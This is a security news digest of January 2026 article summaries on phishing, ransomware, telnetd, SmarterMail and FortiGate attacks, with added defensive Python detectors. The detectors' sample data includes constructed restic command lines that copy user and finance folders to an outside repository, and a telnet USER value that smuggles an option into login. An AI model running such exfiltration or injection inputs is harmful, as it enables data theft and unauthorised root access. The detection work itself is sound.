Daily Brief
Articles are listed below; the summaries are auto-generated.
Total articles found: 12591
| Time | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2026-01-22 19:22:19 | theregister | CYBERCRIME | Attackers Exploit Microsoft Accounts to Target Energy Sector Firms | Attackers used compromised Microsoft accounts and SharePoint-hosted lures to harvest credentials from energy-sector firms, gaining access to corporate inboxes and using them to send phishing email at scale.
The intrusions started from previously compromised email addresses at multiple energy-sector organizations, with SharePoint URLs dressed up as legitimate proposals to draw recipients in.
Once credentials were captured, the attackers added inbox rules that delete incoming mail, hiding their activity while more than 600 phishing emails went out from the compromised accounts.
The follow-on phishing targeted contacts both inside and outside the victim organizations and piggybacked on recent email threads so the messages looked authentic.
The attackers kept control by watching the inboxes, deleting replies, and in some cases tampering with multi-factor authentication settings so that standard remediation steps would not evict them.
Microsoft advises enforcing multi-factor authentication and conditional access policies, stressing that the defence against this campaign is identity-driven.
Organizations are also encouraged to deploy anti-phishing tooling that scans email and linked websites before users reach them. | Details |
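The inbox-rule tampering described above is one of the most reliable post-compromise signals in Microsoft 365. The following is an added example (not code from the article or from Microsoft) that scans Exchange Online admin audit records for New-InboxRule / Set-InboxRule operations that delete, hide or move mail. The record layout (Operation, UserId, and a Parameters list of Name/Value pairs) follows the unified audit log's Exchange admin records; the four sample records are constructed, and the folder and keyword lists are a starting point rather than a complete rule.

```python
"""Flag Exchange Online inbox-rule changes that hide or delete mail, a common
post-compromise step after credential phishing.
Added example; record layout mirrors unified audit log Exchange admin records."""
import json

# Audit operations that create or modify a mailbox rule.
RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
# Rule actions that quietly dispose of mail (checked in this order for stable output).
HIDE_PARAMS = ("DeleteMessage", "SoftDeleteMessage", "MarkAsRead")
# Folders attackers pick because users rarely look in them (assumption: partial list).
SUSPICIOUS_FOLDERS = ("rss feeds", "rss subscriptions", "conversation history",
                      "archive", "deleted items", "junk email")
# Filter words that single out security warnings or payment traffic (assumption: partial list).
KEYWORDS = ("hack", "phish", "password", "suspicious", "invoice", "payment", "fraud", "compromise")
FILTER_PARAMS = ("SubjectContainsWords", "BodyContainsWords", "SubjectOrBodyContainsWords")


def params_of(record):
    """Flatten the record's Parameters list ([{Name, Value}, ...]) into a dict."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}


def rule_findings(record):
    """Return the reasons a rule-change record looks malicious; [] means benign or not a rule change."""
    if record.get("Operation") not in RULE_OPS:
        return []
    p = params_of(record)
    reasons = []
    for name in HIDE_PARAMS:
        if str(p.get(name, "")).lower() == "true":
            reasons.append(f"{name}=True")
    folder = str(p.get("MoveToFolder", "")).lower()
    if folder and any(f in folder for f in SUSPICIOUS_FOLDERS):
        reasons.append(f"MoveToFolder={p['MoveToFolder']}")
    for name in FILTER_PARAMS:
        words = str(p.get(name, "")).lower()
        if words and any(k in words for k in KEYWORDS):
            reasons.append(f"{name}={p[name]!r}")
    # Attackers often leave the rule name empty or a single character.
    if len(str(p.get("Name", "x")).strip()) <= 1:
        reasons.append("near-empty rule name")
    return reasons


def scan(lines):
    """Scan newline-delimited JSON audit records; return (user, rule name, reasons) per hit."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        reasons = rule_findings(rec)
        if reasons:
            hits.append((rec.get("UserId"), params_of(rec).get("Name"), reasons))
    return hits


# Constructed sample records: one hiding rule, one benign newsletter rule,
# one rule edited to divert mail into RSS, and one unrelated login event.
SAMPLE_LOG = """
{"Operation":"New-InboxRule","UserId":"alice@example.com","Parameters":[{"Name":"Name","Value":"."},{"Name":"SubjectContainsWords","Value":"password;suspicious;hacked"},{"Name":"DeleteMessage","Value":"True"},{"Name":"MarkAsRead","Value":"True"}]}
{"Operation":"New-InboxRule","UserId":"bob@example.com","Parameters":[{"Name":"Name","Value":"Newsletters"},{"Name":"From","Value":"news@vendor.example"},{"Name":"MoveToFolder","Value":"Newsletters"}]}
{"Operation":"Set-InboxRule","UserId":"carol@example.com","Parameters":[{"Name":"Identity","Value":"x"},{"Name":"Name","Value":"x"},{"Name":"MoveToFolder","Value":"RSS Subscriptions"}]}
{"Operation":"MailboxLogin","UserId":"alice@example.com","Parameters":[]}
"""

if __name__ == "__main__":
    for user, name, reasons in scan(SAMPLE_LOG.splitlines()):
        print(f"{user}: rule {name!r} flagged: {', '.join(reasons)}")
```

In production the same function runs over `Search-UnifiedAuditLog` output or the Office 365 Management Activity API feed; the point is to key on rule actions and filters, not on the rule name the attacker chose.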
| 2026-01-22 19:08:48 | bleepingcomputer | VULNERABILITIES | Curl Ends Bug Bounty Program Due to AI-Generated Report Surge | The curl project will close its HackerOne bug bounty program on January 31, 2026, because of a flood of low-quality, AI-generated vulnerability reports.
Daniel Stenberg, curl’s founder, cited the overwhelming number of invalid submissions as a key factor, straining the small team of maintainers.
Curl, a widely used command-line utility, has been offering cash rewards for responsibly disclosed vulnerabilities since 2019 through HackerOne.
The decision aims to reduce non-productive submissions and protect the mental health of curl's developers by removing financial incentives for poor-quality reports.
Starting February 1, 2026, curl will transition to an internal submission process via GitHub, ceasing new HackerOne submissions.
The shift reflects broader challenges in managing AI-generated content within open-source security programs, prompting a reevaluation of vulnerability reporting processes.
Curl's updated security policy explicitly warns against low-effort reports and says that those who submit them may be publicly ridiculed. | Details |
| 2026-01-22 18:44:52 | bleepingcomputer | VULNERABILITIES | SmarterMail Vulnerability Exploited to Hijack Admin Accounts | An authentication bypass flaw in SmarterMail allows attackers to reset admin passwords, granting them full privileges on the system.
The flaw lies in the force-reset-password API endpoint, which can be called without authentication, so anyone who can reach it can reset the admin password.
After SmarterMail issued a patch on January 15, threat actors reverse-engineered it and began exploiting the flaw within two days.
SmarterMail, used by MSPs and SMBs worldwide, has over 15 million users, heightening the potential impact of this security issue.
Because an administrator can run OS commands through the product, the bypass chains to full remote code execution on vulnerable systems.
Security researchers created a proof-of-concept exploit demonstrating SYSTEM-level shell access to highlight the severity of the flaw.
Users are advised to upgrade to the latest SmarterMail version, Build 9511, to mitigate this vulnerability and the associated risks. | Details |
| 2026-01-22 18:08:48 | thehackernews | CYBERCRIME | Osiris Ransomware Targets Southeast Asian Food Service Operator | A new ransomware strain, Osiris, targeted a major food service franchisee in Southeast Asia in November 2025, using a BYOVD attack to disable security defenses.
The attack used the POORTRY driver, a purpose-built malicious driver that elevates privileges and kills security tools, which the report frames as a departure from classic BYOVD abuse of legitimately signed but vulnerable drivers.
Osiris uses a hybrid encryption scheme and can stop services, encrypt targeted files, and drop ransom notes.
Attackers exfiltrated sensitive data to Wasabi cloud storage using Rclone before deploying the ransomware, indicating a sophisticated, multi-stage attack.
The attackers leveraged dual-use tools such as Netscan and MeshAgent, and enabled RDP for remote access, showcasing a diverse toolkit.
Potential links to previous INC ransomware activities were noted, suggesting experienced threat actors may be involved.
Organizations are advised to monitor dual-use tools, restrict RDP access, enforce multi-factor authentication, and maintain off-site backups to mitigate such threats.
The ransomware landscape continues to evolve, with a slight increase in attacks reported in 2025, highlighting the persistent threat to enterprises. | Details |
| 2026-01-22 16:34:14 | thehackernews | VULNERABILITIES | Critical Flaw in GNU InetUtils Telnetd Allows Root Access Bypass | A critical vulnerability, CVE-2026-24061, in GNU InetUtils telnetd permits remote login bypass, affecting versions from 1.9.3 to 2.7, with a CVSS score of 9.8.
The flaw is an argument injection: telnetd hands the client-supplied USER environment variable to the login program without sanitising it, so a crafted value bypasses normal authentication and yields root.
The vulnerability was introduced in a code commit from March 2015 and was publicly disclosed by security researcher Carlos Cortes Alvarez in January 2026.
Mitigation strategies include applying the latest patches and restricting telnet port access to trusted clients; disabling telnetd or using a custom login tool are suggested workarounds.
GreyNoise intelligence detected 21 IP addresses attempting to exploit this vulnerability, with origins from multiple countries including the U.S., China, and Germany.
Organizations should prioritize patching and network access controls to prevent exploitation of this critical flaw, which has been actively targeted globally. | Details |
| 2026-01-22 16:34:13 | bleepingcomputer | VULNERABILITIES | Microsoft Teams Introduces Brand Impersonation Alerts for Enhanced Security | Microsoft plans to introduce "Brand Impersonation Protection" in Teams, targeting social engineering threats from external callers posing as trusted entities.
The feature will begin rolling out in mid-February and is enabled by default, with no administrator setup required.
Incoming VoIP calls from first-time external contacts will be scrutinized for brand impersonation, displaying high-risk warnings to users.
Users can choose to accept, block, or end flagged calls, with alerts persisting if suspicious activity continues during the call.
This initiative aims to reduce social engineering risks and improve security by alerting users to potential fraudulent calls.
Microsoft advises IT departments to update training materials and prepare support staff for user inquiries regarding the new security feature.
The addition is part of Microsoft's broader efforts to enhance caller identity protection and secure collaboration within Teams. | Details |
| 2026-01-22 16:25:46 | bleepingcomputer | CYBERCRIME | Operational Security Lapse Exposes INC Ransomware Data Repositories | Cyber Centaurs uncovered an operational security lapse by the INC ransomware gang that let them recover data belonging to 12 U.S. organizations across various sectors.
The investigation began after a ransomware attack on a U.S. organization's SQL Server, revealing the use of a RainINC variant executed from the Windows PerfLogs directory.
Researchers found artifacts of the Restic backup tool, indicating it is part of the gang's kit even though it was not used in the initial intrusion they investigated.
Analysis shifted from incident response to infrastructure examination, revealing persistent attacker-controlled repositories storing encrypted victim data.
A controlled enumeration process confirmed the presence of encrypted data from 12 unrelated organizations, which was subsequently decrypted and preserved.
Cyber Centaurs collaborated with law enforcement to validate data ownership and ensure proper handling of recovered information.
YARA and Sigma rules were developed to detect the use of Restic or its renamed binaries, aiding in early identification of potential ransomware activities.
INC ransomware, a RaaS operation, has claimed several high-profile victims, emphasizing the ongoing threat posed by such criminal enterprises. | Details |
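Cyber Centaurs' YARA and Sigma rules are not reproduced on this page. As an added example of the same idea (not their rules), the following scores process-creation events for restic usage even when the binary has been renamed, by keying on restic's own subcommands, repository flags and backend URL prefixes (s3:, rest:, b2:, sftp:, azure:, gs:, rclone:) rather than on the file name. The event fields (Image, CommandLine) mirror Sysmon event 1; the four events, including one launched from C:\PerfLogs as in the intrusion described above, are constructed, and the PerfLogs path check is a heuristic added here.

```python
"""Detect restic invocations from process-creation events, including renamed binaries.
Added example; fields mirror Sysmon event 1 (Image, CommandLine); events are constructed."""
import re
import shlex

RESTIC_SUBCOMMANDS = {"init", "backup", "snapshots", "restore", "forget", "prune",
                      "check", "ls", "dump", "mount", "copy"}
RESTIC_FLAGS = {"-r", "--repo", "--repository-file", "-p", "--password-file",
                "--password-command", "--insecure-no-password"}
# Repository backends restic accepts as a URL scheme; a renamed binary still needs one of these.
BACKEND_PREFIX = re.compile(r"^(s3|rest|b2|sftp|azure|gs|rclone):", re.I)
ENV_HINTS = ("RESTIC_REPOSITORY", "RESTIC_PASSWORD")
# Assumption for this example: the intrusion above ran tooling from C:\PerfLogs,
# so treat it as a risky launch directory.
RISKY_DIRS = ("c:\\perflogs\\",)


def _tokens(cmdline):
    """Split a Windows command line on whitespace while respecting quotes."""
    try:
        return [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return cmdline.split()


def restic_indicators(cmdline):
    """Collect restic-specific indicators from a command line (program name ignored)."""
    found = set()
    for arg in _tokens(cmdline)[1:]:
        low = arg.lower()
        if low in RESTIC_SUBCOMMANDS:
            found.add("subcommand:" + low)
        elif low in RESTIC_FLAGS:
            found.add("flag:" + low)
        elif BACKEND_PREFIX.match(arg):
            found.add("backend:" + arg.split(":", 1)[0].lower())
    for env in ENV_HINTS:
        if env in cmdline.upper():
            found.add("env:" + env)
    return found


def _program_names(event):
    """Base names of the image and of every .exe mentioned on the command line."""
    names = [event["Image"]] + [t for t in _tokens(event["CommandLine"]) if t.lower().endswith(".exe")]
    return {n.replace("\\", "/").rsplit("/", 1)[-1].lower() for n in names}


def classify(event):
    """Return (verdict, indicators): verdict is 'restic', 'restic-renamed' or None."""
    ind = restic_indicators(event["CommandLine"])
    has_sub = any(i.startswith("subcommand:") for i in ind)
    has_repo = any(i.startswith(("flag:", "backend:")) for i in ind)
    has_env = any(i.startswith("env:") for i in ind)
    # Require a subcommand plus a repository hint, or an explicit RESTIC_* variable;
    # a lone "-p" (as svchost uses) is not enough.
    if not ((has_sub and has_repo) or has_env):
        return None, ind
    if event["Image"].lower().startswith(RISKY_DIRS):
        ind.add("path:PerfLogs")
    verdict = "restic" if any("restic" in n for n in _program_names(event)) else "restic-renamed"
    return verdict, ind


def scan(events):
    """Return (image, verdict, sorted indicators) for every event that looks like restic."""
    hits = []
    for ev in events:
        verdict, ind = classify(ev)
        if verdict:
            hits.append((ev["Image"], verdict, sorted(ind)))
    return hits


SAMPLE_EVENTS = [  # constructed
    {"Image": r"C:\PerfLogs\svchost.exe",
     "CommandLine": r'"C:\PerfLogs\svchost.exe" -r rest:http://203.0.113.10:8000/repo backup C:\Users --password-file C:\PerfLogs\p.txt'},
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs -p"},
    {"Image": r"C:\Tools\restic.exe", "CommandLine": "restic.exe -r s3:s3.amazonaws.com/backups snapshots"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c set RESTIC_PASSWORD=hunter2 && C:\PerfLogs\r.exe -r b2:bucket:/repo backup D:\Finance'},
]

if __name__ == "__main__":
    for image, verdict, ind in scan(SAMPLE_EVENTS):
        print(f"{verdict:15} {image}  [{', '.join(ind)}]")
```

The same token lists translate directly into a Sigma `process_creation` rule (CommandLine contains the subcommand and one of the backend prefixes, Image not ending in `restic.exe`); the Python version is handy for backfilling over exported EDR data.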
| 2026-01-22 16:09:15 | theregister | VULNERABILITIES | FortiGate Firewalls Face Persistent Threats Despite Recent Patches | Arctic Wolf has identified automated attacks on FortiGate firewalls that abuse the FortiCloud single sign-on login path to alter settings and exfiltrate configuration files.
Attackers sidestep SSO protections, create backdoor admin users, and export configurations containing sensitive credentials and network details.
The intrusions are linked to two critical authentication bypass vulnerabilities, CVE-2025-59718 and CVE-2025-59719, initially patched in December.
Despite patches, administrators report ongoing intrusions, suggesting a patch bypass for CVE-2025-59718; Fortinet is preparing additional updates.
Affected customers have observed attacks originating from specific IP addresses, with logs showing unauthorized SSO logins and admin account creation.
Arctic Wolf advises auditing admin accounts, reviewing configuration changes, rotating credentials, and monitoring SSO activity until new patches are available.
Fortinet plans to release FortiOS updates 7.4.11, 7.6.6, and 8.0.0 to address the vulnerabilities fully. | Details |
| 2026-01-22 15:01:43 | bleepingcomputer | MISCELLANEOUS | Hybrid Work Spurs Surge in Active Directory Password Resets | The shift to hybrid work environments has significantly increased Active Directory password reset incidents, impacting employee productivity and IT helpdesk operations.
Remote employees face frequent account lockouts when cached domain credentials on their devices go stale after a password change, and stricter rotation requirements make this happen more often, driving up helpdesk tickets.
Each password reset costs an estimated $70 in IT resources, with organizations processing hundreds annually, resulting in substantial financial burdens.
The hidden costs of password resets include lost productivity, as employees wait for IT assistance, affecting overall business efficiency.
Self-service password reset tools offer a solution, enabling employees to securely reset credentials without IT intervention, reducing downtime and operational costs.
Organizations implementing self-service solutions report annual savings of approximately $65,000 on resets and an additional $48,000 on account unlocks.
Effective self-service tools should integrate seamlessly with existing Active Directory infrastructure and address remote work-specific challenges, such as cached credential updates. | Details |
| 2026-01-22 14:25:03 | thehackernews | NATION STATE ACTIVITY | Operation Nomad Leopard Targets Afghan Government with Backdoor Malware | A spear-phishing campaign, Operation Nomad Leopard, is targeting Afghan government entities using decoy administrative documents to distribute the FALSECUB backdoor.
Attackers leverage a GitHub-hosted ISO image file containing a LNK file and a PDF to execute the payload, indicating a low-to-moderate sophistication level.
The campaign, detected in December 2025, has not been attributed to a known group or country; the targeting suggests a regionally focused threat actor.
The backdoor, a C++ executable, receives commands from an external server, posing a significant threat to governmental operations and data security.
Organizations are advised to strengthen email security protocols and conduct employee training to recognize phishing attempts.
This incident demonstrates the persistent threat of spear-phishing campaigns and the need for continuous vigilance and enhanced cybersecurity measures. | Details |
| 2026-01-22 13:44:36 | theregister | DATA BREACH | GDPR Fines Surpass €1.2 Billion Amid Surge in Data Breaches | European regulators issued over €1.2 billion in GDPR fines in 2025, reflecting increased enforcement activity and a rise in data breach notifications.
Daily data breach reports in Europe averaged 443, marking a 22% increase from the previous year, the highest since GDPR's inception.
The DLA Piper survey attributes the surge to geopolitical factors, frequent cyber incidents, and easily accessible attack tools.
Organizations face challenges from new cybersecurity laws like NIS2 and DORA, raising disclosure requirements and imposing personal liability on management.
Ireland leads GDPR enforcement, with €4.04 billion in fines since 2018, including a €530 million penalty against TikTok for data transfer violations.
Big tech companies remain primary targets, with nine of the ten largest GDPR fines levied against them.
GDPR enforcement has settled into a routine of regular penalties and rising breach reporting, and the survey urges businesses to invest in cyber defences and resilience. | Details |
| 2026-01-22 13:33:20 | theregister | VULNERABILITIES | Bank of England Report Finds Persistent Cybersecurity Gaps in Finance Sector | The Bank of England's 2025 cybersecurity review identifies ongoing basic security gaps within financial organizations, despite extensive regulatory frameworks.
Common issues include poor access controls, weak passwords, and misconfigured systems, which together pose significant risk to financial institutions' infrastructure.
Social engineering attacks, such as phishing, remain a critical threat due to inadequate staff training and awareness in security practices.
The National Cyber Security Centre warns that groups like Scattered Spider exploit these vulnerabilities using phishing and spear-phishing tactics.
CBEST assessments note improvements in multi-factor authentication, but many organizations still struggle to integrate cyber threat intelligence into their operations.
The report emphasizes the need for financial entities to build resilience against sophisticated and state-sponsored cyber threats.
Maturity in managing cyber threat intelligence varies widely across the sector, leaving clear room for improvement.
The CBEST assessments aim to guide financial institutions in identifying and addressing prevalent security gaps to prevent damaging cyber incidents. | Details |
| 2026-01-22 12:32:53 | bleepingcomputer | VULNERABILITIES | Pwn2Own Automotive 2026 Reveals 29 Zero-Day Vulnerabilities in EV Systems | On its second day, the Pwn2Own Automotive 2026 event in Tokyo awarded $439,250 to researchers who exploited 29 zero-day vulnerabilities in automotive technologies.
Researchers targeted fully patched systems, including EV chargers, in-vehicle infotainment systems, and car operating systems like Automotive Grade Linux.
Fuzzware.io led the competition, earning $213,000 by exploiting vulnerabilities in EV charging controllers and multimedia receivers.
Other participants, including Summoning Team and Technical Debt Collectors, demonstrated zero-day exploits on navigation receivers and charging stations.
Over the first two days, participants earned $955,750 by exploiting 66 zero-day vulnerabilities, showcasing significant security gaps in automotive technologies.
Vendors have a 90-day window to develop and release patches for these zero-day flaws before Trend Micro's Zero Day Initiative discloses them publicly.
The event underscores the critical need for robust security measures in the rapidly evolving automotive technology landscape. | Details |
| 2026-01-22 12:25:17 | theregister | VULNERABILITIES | Critical Telnet Vulnerability Exposes Systems to Root Access Exploits | A critical vulnerability in the GNU InetUtils telnet daemon (telnetd), tracked as CVE-2026-24061, allows attackers to gain root access on systems that still expose this legacy service.
The flaw, present for nearly 11 years, was disclosed on January 20 and is rated with a severity score of 9.8, indicating a critical risk level.
GreyNoise reported 15 unique IP addresses attempting to exploit this vulnerability within 24 hours of its disclosure, signaling active exploitation efforts.
The vulnerability involves an argument injection flaw, allowing attackers to bypass authentication with a crafted USER environment variable, granting root access.
Security experts recommend immediate patching and suggest migrating to more secure alternatives like SSH to mitigate potential risks.
National cybersecurity agencies in France, Canada, and Belgium have issued advisories urging the decommissioning of telnet services due to inherent security risks.
The incident serves as a reminder of the importance of regular system updates and the need to phase out legacy systems vulnerable to exploitation. | Details |
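Both telnetd items above describe an argument injection through the USER environment variable, which a telnet client supplies via the NEW-ENVIRON option (RFC 1572). The following is an added example (not from either article, GreyNoise or the GNU project) that parses NEW-ENVIRON suboptions out of raw client bytes, including the ESC and doubled-IAC escaping the RFC defines, and flags USER values that a login program would parse as an option rather than a user name. The leading-dash test is the generic check for this vulnerability class; the exact payload used in the wild is not reproduced here, and the byte stream is constructed.

```python
"""Extract NEW-ENVIRON (RFC 1572) USER values from raw telnet client bytes and flag
values that a login program would parse as an option. Added example; stream is constructed."""
IAC, SB, SE = 255, 250, 240
NEW_ENVIRON = 39           # telnet option code for NEW-ENVIRON
IS, INFO = 0, 2            # suboption commands a client sends (SEND=1 comes from the server)
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3


def parse_new_environ(body):
    """Parse one NEW-ENVIRON suboption body (bytes after the option code, IAC IAC already
    collapsed) into (type, name, value) tuples; ESC makes the following byte literal."""
    if not body or body[0] not in (IS, INFO):
        return []
    entries, cur = [], None      # cur = [type, name, value, in_value]
    i, n = 1, len(body)
    while i < n:
        b = body[i]
        if b in (VAR, USERVAR):
            if cur is not None:
                entries.append((cur[0], bytes(cur[1]), bytes(cur[2])))
            cur = [b, bytearray(), bytearray(), False]
        elif cur is None:
            pass                 # data before the first VAR/USERVAR is malformed; ignore it
        elif b == VALUE:
            cur[3] = True
        else:
            if b == ESC and i + 1 < n:
                i += 1           # escaped byte: take the next one literally
                b = body[i]
            (cur[2] if cur[3] else cur[1]).append(b)
        i += 1
    if cur is not None:
        entries.append((cur[0], bytes(cur[1]), bytes(cur[2])))
    return entries


def _find_se(stream, i):
    """Index of the IAC that begins IAC SE, skipping escaped IAC IAC pairs; -1 if absent."""
    while i < len(stream) - 1:
        if stream[i] == IAC:
            if stream[i + 1] == SE:
                return i
            i += 2
        else:
            i += 1
    return -1


def extract_user_values(stream):
    """Return every USER value carried by NEW-ENVIRON suboptions in a raw telnet byte stream."""
    users, pos = [], 0
    start = bytes([IAC, SB, NEW_ENVIRON])
    while True:
        s = stream.find(start, pos)
        if s < 0:
            return users
        e = _find_se(stream, s + 3)
        if e < 0:
            return users         # truncated suboption: nothing more to parse
        body = stream[s + 3:e].replace(b"\xff\xff", b"\xff")
        for typ, name, value in parse_new_environ(body):
            if typ == VAR and name == b"USER":
                users.append(value.decode("latin-1"))
        pos = e + 2


def check_user(user):
    """None if the value looks like a plain user name, else why it looks like an injection."""
    if user.startswith("-"):
        return "leading '-' (parsed as an option, not a user name, by login)"
    if any(c in user for c in " \t\r\n\x00"):
        return "whitespace or NUL inside the user name"
    return None


def flagged_users(stream):
    """(value, reason) for every suspicious USER value in the stream."""
    return [(u, check_user(u)) for u in extract_user_values(stream) if check_user(u)]


# Constructed client traffic: a normal session, then one carrying an injected USER value
# and a USERVAR using both escaping forms (IAC IAC and ESC) to exercise the parser.
SAMPLE_STREAM = (
    b"\xff\xfb\x27"                                   # IAC WILL NEW-ENVIRON
    + b"\xff\xfa\x27\x00" + b"\x00USER\x01alice" + b"\x00DISPLAY\x01host:0" + b"\xff\xf0"
    + b"\xff\xfa\x27\x00" + b"\x03WEIRD\x01a\xff\xffb\x02\x01c" + b"\x00USER\x01-injected" + b"\xff\xf0"
)

if __name__ == "__main__":
    for user, reason in flagged_users(SAMPLE_STREAM):
        print(f"suspicious USER {user!r}: {reason}")
```

Fed the client side of a captured TCP/23 stream (for example from a full-packet capture of a honeypot), this gives a quick triage of which connections were exploitation attempts rather than scanners; the same check belongs in telnetd itself, which is why a custom login wrapper that rejects such values is a workable interim mitigation.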
| 2026-01-22 11:53:44 | bleepingcomputer | VULNERABILITIES | Fortinet FortiGate Devices Face Exploitation Through SSO Vulnerability | Arctic Wolf reports a new campaign targeting Fortinet FortiGate devices that exploits a not-yet-identified vulnerability in the single sign-on feature to create rogue accounts and steal firewall configurations.
The attacks began on January 15 and show similarities to previous incidents related to a critical authentication bypass vulnerability (CVE-2025-59718) in Fortinet products.
Attackers exploit the vulnerability via malicious SAML messages, allowing them to bypass authentication on vulnerable FortiGate firewalls when FortiCloud SSO is enabled.
Fortinet's latest FortiOS version (7.4.10) does not fully address the vulnerability, prompting plans for further updates (7.4.11, 7.6.6, and 8.0.0) to mitigate the issue.
Administrators are advised to disable FortiCloud SSO temporarily to prevent unauthorized access until a comprehensive patch is released.
Shadowserver is monitoring nearly 11,000 online Fortinet devices with FortiCloud SSO enabled, highlighting the potential scale of exposure.
CISA has added CVE-2025-59718 to its catalog of known exploited vulnerabilities, mandating federal agencies to apply patches within a week. | Details |
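Both FortiGate items above come down to the same two checks: find admin accounts you did not create, and find privileged accounts with no source-IP restriction. The following is an added example (not Arctic Wolf's or Fortinet's code) that parses the `config system admin` section of a FortiOS configuration export and compares it against an approved-account list. The configuration text is constructed with placeholder password hashes; the keys used (accprofile, trusthost1, two-factor) are standard FortiOS admin settings, and the approved list is an assumption made for the example.

```python
"""Audit the 'config system admin' section of a FortiOS configuration export against
an approved-account list. Added example; configuration text is constructed."""


def parse_admins(config_text):
    """Return {admin name: {setting: value}} from the top-level 'config system admin' block.
    Nested config/end blocks inside an account (for example gui-dashboard) are skipped."""
    admins, current, in_admin, depth = {}, None, False, 0
    for raw in config_text.splitlines():
        line = raw.strip()
        if not in_admin:
            in_admin = line == "config system admin"
            continue
        if line.startswith("config "):
            depth += 1
        elif line == "end":
            if depth == 0:
                break                       # end of the admin section
            depth -= 1
        elif depth:
            continue                        # inside a nested block
        elif line.startswith("edit "):
            current = line[5:].strip().strip('"')
            admins[current] = {}
        elif line == "next":
            current = None
        elif line.startswith("set ") and current is not None:
            key, _, value = line[4:].partition(" ")
            admins[current][key] = value.strip().strip('"')
    return admins


def audit_admins(admins, approved):
    """Compare parsed accounts with approved = {name: accprofile}; return (name, finding) pairs."""
    findings = []
    for name, s in admins.items():
        if name not in approved:
            findings.append((name, "account not in the approved list"))
        if s.get("accprofile") == "super_admin" and approved.get(name) != "super_admin":
            findings.append((name, "super_admin profile not approved for this account"))
        if not any(k.startswith("trusthost") for k in s):
            findings.append((name, "no trusthost restriction (reachable from any source IP)"))
        # FortiOS omits 'two-factor' from the export when it is at its default (disable).
        if s.get("two-factor", "disable") == "disable":
            findings.append((name, "two-factor authentication disabled"))
    return findings


APPROVED = {"admin": "super_admin", "svc_backup": "prof_admin"}   # assumption for this example

SAMPLE_CONFIG = """\
config system global
    set hostname "fw-edge-01"
end
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set two-factor fortitoken
        set password ENC PLACEHOLDER
    next
    edit "svc_backup"
        set trusthost1 10.20.0.0 255.255.255.0
        set accprofile "prof_admin"
        set vdom "root"
        set password ENC PLACEHOLDER
    next
    edit "support_tmp"
        set accprofile "super_admin"
        set vdom "root"
        config gui-dashboard
            edit 1
                set name "Status"
            next
        end
        set password ENC PLACEHOLDER
    next
end
"""

if __name__ == "__main__":
    for name, finding in audit_admins(parse_admins(SAMPLE_CONFIG), APPROVED):
        print(f"{name}: {finding}")
```

Run it against a fresh `execute backup config` export from each firewall and diff the findings against the previous run; a new super_admin account with no trusthost, like `support_tmp` in the sample, is exactly the backdoor pattern described above, and the exported configuration should itself be treated as sensitive because it contains credentials.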